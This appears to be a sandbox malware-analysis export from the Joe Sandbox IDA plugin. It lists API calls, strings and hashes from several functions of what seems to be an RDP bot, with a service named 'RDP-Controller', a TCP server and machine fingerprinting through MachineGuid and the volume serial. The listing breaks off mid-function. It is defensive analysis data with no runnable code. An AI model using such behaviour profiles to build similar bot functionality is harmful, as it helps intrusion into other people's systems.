standalone, xrefs: 00007FF6EF651DCA

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
API String ID: 3617873859-308889057
Opcode ID: 1fc342a3e2137554fd4581aff8ff3e54cdb34c78680a949aad63a6d78d1a5a0b
Instruction ID: e379429c7db98664998d551dc9da77ba767bf14d1c120f509e9ff52bd7ba3367
Opcode Fuzzy Hash: 1fc342a3e2137554fd4581aff8ff3e54cdb34c78680a949aad63a6d78d1a5a0b
Instruction Fuzzy Hash: FA510726E1C64397FB605710A49037823AEAF58348F540D32E94EE6293DF5FE985B20F

Function 00007FF6EF651131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,00007FF6EF651313), ref: 00007FF6EF65116E
_amsg_exit.MSVCRT(?,?,?,00007FF6EF651313), ref: 00007FF6EF65118D
_initterm.MSVCRT ref: 00007FF6EF6511AE
_initterm.MSVCRT ref: 00007FF6EF6511D3
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6EF651313), ref: 00007FF6EF651212
malloc.MSVCRT ref: 00007FF6EF651244
strlen.MSVCRT ref: 00007FF6EF65125C
malloc.MSVCRT ref: 00007FF6EF651268
_cexit.MSVCRT(?,?,?,00007FF6EF651313), ref: 00007FF6EF6512E3

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
Instruction ID: 47676ecc53c82038398837b09593916365f33bfaf7792173e8ba3742c2c3eac9
Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
Instruction Fuzzy Hash: 78514A23E18A4787FB50DF21E85037923A9AF44B84F058935E90DD7396DE3EE440A34A

Function 00007FFE0E135EEA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0E135F12
WSAGetLastError.WS2_32 ref: 00007FFE0E135F2C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0E135F8A
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E135F4D
tcp_recv, xrefs: 00007FFE0E135F46, 00007FFE0E135F5E, 00007FFE0E135F83
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0E135F65

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 38f8d3981f46cf077d29cf7f9c2752560a238c82d17b9e1c80a92427f143cbc7
Instruction ID: 08a7365b9e4e1f5f71e145e378fd3a2bdb3c443956582e5495b9cca081fc6a61
Opcode Fuzzy Hash: 38f8d3981f46cf077d29cf7f9c2752560a238c82d17b9e1c80a92427f143cbc7
Instruction Fuzzy Hash: 761130E8F0C61792F6105739A8402F83255AF46BF8F501337E9FD9A6F5DE6CA9568300

Function 00007FF6EF654FC5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF6EF65500A
fseek.MSVCRT ref: 00007FF6EF655029
_errno.MSVCRT ref: 00007FF6EF65503D
_errno.MSVCRT ref: 00007FF6EF655058
_errno.MSVCRT ref: 00007FF6EF655117

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

_errno.MSVCRT ref: 00007FF6EF655132
_errno.MSVCRT ref: 00007FF6EF65517F
fclose.MSVCRT ref: 00007FF6EF655520

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65555C
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF6EF655231
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF6EF6550EC
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF6EF655412
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF6EF65559F
(buf_sz != NULL), xrefs: 00007FF6EF6550B9
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF6EF65504C
fs_file_read, xrefs: 00007FF6EF655045, 00007FF6EF65508D, 00007FF6EF6550C0, 00007FF6EF6550F3, 00007FF6EF65511F, 00007FF6EF65522A, 00007FF6EF655340, 00007FF6EF65540B, 00007FF6EF6554CA, 00007FF6EF655555, 00007FF6EF655598
NULL, xrefs: 00007FF6EF655589
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF655094, 00007FF6EF6550C7, 00007FF6EF6550FA
(path != NULL), xrefs: 00007FF6EF655086
mem_alloc, xrefs: 00007FF6EF6553E4
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF6EF655126
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF6EF6553EB
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF6EF655347
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF6EF6554D1
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF65507F, 00007FF6EF6550B2, 00007FF6EF6550E5

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: 4115192af16a4c9e579fc7fcde00cfa20cb0733149147f2840e506c55bace900
Instruction ID: 43d5405becffd908476dded0d9503f03d0947980ba7189639ccd7643de681d23
Opcode Fuzzy Hash: 4115192af16a4c9e579fc7fcde00cfa20cb0733149147f2840e506c55bace900
Instruction Fuzzy Hash: E5D1B623A1860383FB109F54E8443782769BF55B98F454832E50DE72A2EF3EE945F34A

Function 00007FFE13383AA7 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 327
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE13383AC2
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE13383AEF
CreateThread.KERNEL32 ref: 00007FFE13383B3B
CreateThread.KERNEL32 ref: 00007FFE13383B9B
CreateThread.KERNEL32 ref: 00007FFE13383BFB
GetLastError.KERNEL32 ref: 00007FFE13383C52
GetLastError.KERNEL32 ref: 00007FFE13383D6E
GetLastError.KERNEL32 ref: 00007FFE13383E46

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

GetLastError.KERNEL32 ref: 00007FFE13383F4E

Part of subcall function 00007FFE13382072: EnterCriticalSection.KERNEL32 ref: 00007FFE13382143
Part of subcall function 00007FFE13382072: LeaveCriticalSection.KERNEL32 ref: 00007FFE1338216B
Part of subcall function 00007FFE13382072: CopyFileA.KERNEL32 ref: 00007FFE133821C8

GetLastError.KERNEL32 ref: 00007FFE1338404C

Strings

~, xrefs: 00007FFE13383CD0
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu), xrefs: 00007FFE13383C64
, xrefs: 00007FFE13383D8C
P, xrefs: 00007FFE13383DF5
routine_tx, xrefs: 00007FFE13383C11
server_init, xrefs: 00007FFE13383B58, 00007FFE13383BB8, 00007FFE13383C18, 00007FFE13383C3A, 00007FFE13383C5D, 00007FFE13383D79, 00007FFE13383E51, 00007FFE13383F59, 00007FFE13384057, 00007FFE1338414A
routine_gc, xrefs: 00007FFE13383B51
P, xrefs: 00007FFE13383CD5
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFE13383B5F, 00007FFE13383BBF, 00007FFE13383C1F
, xrefs: 00007FFE13383C70
[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu), xrefs: 00007FFE13383E58
, xrefs: 00007FFE13383E64
[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu), xrefs: 00007FFE1338405E
Done, xrefs: 00007FFE13383C33
~, xrefs: 00007FFE13383FC1
routine_accept, xrefs: 00007FFE13383BB1
[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu), xrefs: 00007FFE13383F60
P, xrefs: 00007FFE13383FC6
, xrefs: 00007FFE1338406A
~, xrefs: 00007FFE13384092
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE13384151
~, xrefs: 00007FFE13383EB9
, xrefs: 00007FFE13383F6C
P, xrefs: 00007FFE13384097
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu), xrefs: 00007FFE13383D80
P, xrefs: 00007FFE13383EBE
[I] (%s) -> %s, xrefs: 00007FFE13383C41
~, xrefs: 00007FFE13383DEC

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
API String ID: 3214881788-719614687
Opcode ID: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
Instruction ID: 4b751e38589d93fb4f259a4f10ba8aa5c5ca637d1517c141149c2d31a7f5a150
Opcode Fuzzy Hash: dac36e3bd0cdf9df57b4b9ad19cad6874c2198d7d1dc801a52f0c0ee30f6488d
Instruction Fuzzy Hash: 55F1E364E0CF0389FA605717A88037D2252AF34775F6003F6C57E66AF1DE6EAAC58349

Function 00007FFE1338482C Relevance: 58.0, APIs: 11, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE13385154: LoadLibraryA.KERNEL32 ref: 00007FFE13385162

Part of subcall function 00007FFE133850D3: GetProcAddress.KERNEL32 ref: 00007FFE133850F3

FreeLibrary.KERNEL32 ref: 00007FFE133848BF
GetNativeSystemInfo.KERNEL32 ref: 00007FFE1338490B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE13384924
GetLastError.KERNEL32 ref: 00007FFE13384932

Strings

~, xrefs: 00007FFE13384B59
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE13384A4C, 00007FFE13384B20
ntdll.dll, xrefs: 00007FFE13384834
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE13384A25
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE13384A5A
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE13384AF7
\, xrefs: 00007FFE13384A90
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE13384944
, xrefs: 00007FFE13384B03
MachineGuid, xrefs: 00007FFE13384A53
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE13384C7E
P, xrefs: 00007FFE13384B62
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE133848A4
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE13384D57
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE133848D9
C:\Windows, xrefs: 00007FFE1338491D, 00007FFE13384A10
%, xrefs: 00007FFE13384A39
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE13384BE8
sys_init, xrefs: 00007FFE1338489D, 00007FFE133848D2, 00007FFE1338493D, 00007FFE13384A1E, 00007FFE13384AF0, 00007FFE13384B2E, 00007FFE13384BE1, 00007FFE13384C77, 00007FFE13384D50
:, xrefs: 00007FFE13384A8B
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE13384B35
RtlGetVersion, xrefs: 00007FFE1338484C

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
Instruction ID: 315e19cb864d6292cb640a6bbbda15ace2c298b922fc62e136cc44729451c1c0
Opcode Fuzzy Hash: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
Instruction Fuzzy Hash: 7CD15D21E0CE52CDFB608717E4403BC26A1AB70775F1546FAC96E77EB4DE2DA8848349

Function 00007FFE0E13210C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E132A34: LoadLibraryA.KERNEL32 ref: 00007FFE0E132A42

Part of subcall function 00007FFE0E1329B3: GetProcAddress.KERNEL32 ref: 00007FFE0E1329D3

FreeLibrary.KERNEL32 ref: 00007FFE0E13219F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0E1321EB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0E132204
GetLastError.KERNEL32 ref: 00007FFE0E132212

Strings

:, xrefs: 00007FFE0E13236B
\, xrefs: 00007FFE0E132370
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0E132184
%, xrefs: 00007FFE0E132319
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0E132637
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0E132415
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0E132305
ntdll.dll, xrefs: 00007FFE0E132114
MachineGuid, xrefs: 00007FFE0E132333
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0E1323D7
sys_init, xrefs: 00007FFE0E13217D, 00007FFE0E1321B2, 00007FFE0E13221D, 00007FFE0E1322FE, 00007FFE0E1323D0, 00007FFE0E13240E, 00007FFE0E1324C1, 00007FFE0E132557, 00007FFE0E132630
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0E1324C8
~, xrefs: 00007FFE0E132439
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0E13233A
P, xrefs: 00007FFE0E132442
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E1321B9
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0E132224
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0E13232C, 00007FFE0E132400
, xrefs: 00007FFE0E1323E3
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0E13255E
RtlGetVersion, xrefs: 00007FFE0E13212C
C:\Windows, xrefs: 00007FFE0E1321FD, 00007FFE0E1322F0

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: fde8f6f1b3ef3eafbfe813b66c9eb851002a437269388e927bd3a53b743e4f08
Instruction ID: f3c228d3f79a12cdca37816df22e435133b57a7defac2bae4d4095a693300235
Opcode Fuzzy Hash: fde8f6f1b3ef3eafbfe813b66c9eb851002a437269388e927bd3a53b743e4f08
Instruction Fuzzy Hash: 3ED143A2E0C65281FB20AB64F8403B876A0EF85794F650133DADE173B5DE3DE985C781

Function 00007FFE126D6E0C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE126D7734: LoadLibraryA.KERNEL32 ref: 00007FFE126D7742

Part of subcall function 00007FFE126D76B3: GetProcAddress.KERNEL32 ref: 00007FFE126D76D3

FreeLibrary.KERNEL32 ref: 00007FFE126D6E9F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE126D6EEB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE126D6F04
GetLastError.KERNEL32 ref: 00007FFE126D6F12

Strings

[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE126D71C8
, xrefs: 00007FFE126D70E3
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126D6EB9
~, xrefs: 00007FFE126D7139
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE126D7337
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE126D7005
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE126D6F24
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE126D7115
C:\Windows, xrefs: 00007FFE126D6EFD, 00007FFE126D6FF0
\, xrefs: 00007FFE126D7070
sys_init, xrefs: 00007FFE126D6E7D, 00007FFE126D6EB2, 00007FFE126D6F1D, 00007FFE126D6FFE, 00007FFE126D70D0, 00007FFE126D710E, 00007FFE126D71C1, 00007FFE126D7257, 00007FFE126D7330
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE126D702C, 00007FFE126D7100
%, xrefs: 00007FFE126D7019
P, xrefs: 00007FFE126D7142
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE126D725E
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE126D6E84
MachineGuid, xrefs: 00007FFE126D7033
RtlGetVersion, xrefs: 00007FFE126D6E2C
:, xrefs: 00007FFE126D706B
ntdll.dll, xrefs: 00007FFE126D6E14
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE126D703A
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE126D70D7

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: bda70ea524b49ecb178049aaa29923fcfeb8a31155ef0d5133f67201ab185293
Instruction ID: 89bfad26da5fb5eb3afefbf8782fee188894321ca03475694ad316b106b0c015
Opcode Fuzzy Hash: bda70ea524b49ecb178049aaa29923fcfeb8a31155ef0d5133f67201ab185293
Instruction Fuzzy Hash: 60D15C21E1CE9F86FB259B17EC807B86260AF50774F1901B6D98D072F4DEADED458382

Function 00007FFE11EC348C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE11EC3DB4: LoadLibraryA.KERNEL32 ref: 00007FFE11EC3DC2

Part of subcall function 00007FFE11EC3D33: GetProcAddress.KERNEL32 ref: 00007FFE11EC3D53

FreeLibrary.KERNEL32 ref: 00007FFE11EC351F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE11EC356B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11EC3584
GetLastError.KERNEL32 ref: 00007FFE11EC3592

Strings

RtlGetVersion, xrefs: 00007FFE11EC34AC
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE11EC39B7
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE11EC3848
